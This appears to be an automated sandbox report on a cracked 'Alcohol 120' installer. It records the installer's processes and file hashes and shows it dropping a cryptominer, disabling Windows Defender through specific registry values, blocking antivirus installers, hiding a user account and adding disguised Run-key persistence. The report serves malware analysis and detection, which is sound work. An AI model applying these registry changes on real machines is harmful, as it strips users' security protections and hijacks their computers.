rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 264

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\SetupHlp.dll

MD5 65112ef6166d441df23715707c7488f7
SHA1 6e8ffef9a32978f43529b12e4a984df6365101be
SHA256 3b8406b26ba2f856192ded44e707d8a1a81daee89403a2600cae085e48b49713
SHA512 c0d1e5214958630beae24e4b2e8bf67553a1c695df7c3e78ff4a69a1ab27e8ded53a87d696185b0defc460ee2c3ac3e6912be263f332de04bcdabe3ecb9e589e

memory/3544-4-0x0000000074C50000-0x0000000074C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\System.dll

MD5 c17103ae9072a06da581dec998343fc1
SHA1 b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256 dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512 d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

memory/3544-14-0x0000000074C50000-0x0000000074C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\LangDLL.dll

MD5 9384f4007c492d4fa040924f31c00166
SHA1 aba37faef30d7c445584c688a0b5638f5db31c7b
SHA256 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA512 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

memory/3544-24-0x00000000746C0000-0x00000000746D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\nsDialogs.dll

MD5 c10e04dd4ad4277d5adc951bb331c777
SHA1 b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256 e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhost.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\update.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\taskhost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\RealtekHD\taskhostw.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 208 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2008 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 2184 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4992 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2012 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 4120 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 2688 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 3812 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3812 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4304 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4304 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1672 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1672 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1672 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1672 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1672 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1672 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 2912 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 2912 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 2912 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2912 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2912 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2912 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4868 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4868 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 4868 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 4868 wrote to memory of 548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4868 wrote to memory of 548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
